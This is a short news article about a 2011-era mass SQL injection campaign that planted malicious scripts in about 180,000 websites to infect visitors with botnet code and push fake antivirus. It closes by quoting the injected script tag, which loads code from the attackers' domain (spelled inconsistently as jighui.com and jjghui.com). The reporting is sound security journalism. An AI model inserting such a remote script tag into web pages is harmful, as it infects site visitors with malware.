So far, 180,000 sites have had been penetrated by the new attack, which differs from existing SQL injections like the ones that cracked Sony 17 or 18 times because it attacks not one site at a time, but dozens.
Once they're cracked, the infected sites start serving copies of the malware to their visitors, extending the attack even further.
The attacks started Oct. 9, according to web security provider Armorize, which also found only six of 43 virus detectors can pick up the malicious code.
When a visitor hits the site, the pages link the browser to a site called jighui.com, which runs a script that infects it with botnet-control code that gives the botnet owner control to run code or make changes on the newly zombified machine.
The injector and subsequent download from jjghui.com appear to be designed to sell fake antivirus software, but the SQL injections makes the site vulnerable to anyone else with enough savvy to run a Google search to identify vulnerable machines, and hit them with a different set of exploits, according to Rothacker.
The jighui attack – named for the site from which it downloads the secondary payload – is owned or controlled by the same person who launched a similar set of attacks called LizaMoon last spring. Sites with the name of each exploit are registered to James Northone of Plainview, NY, though the name appears to be an alias and his actual identity is a mystery
One-line injection, unlimited possibilties
The injected script reads:
<script src=http://jjghui.com/urchin.js> </script>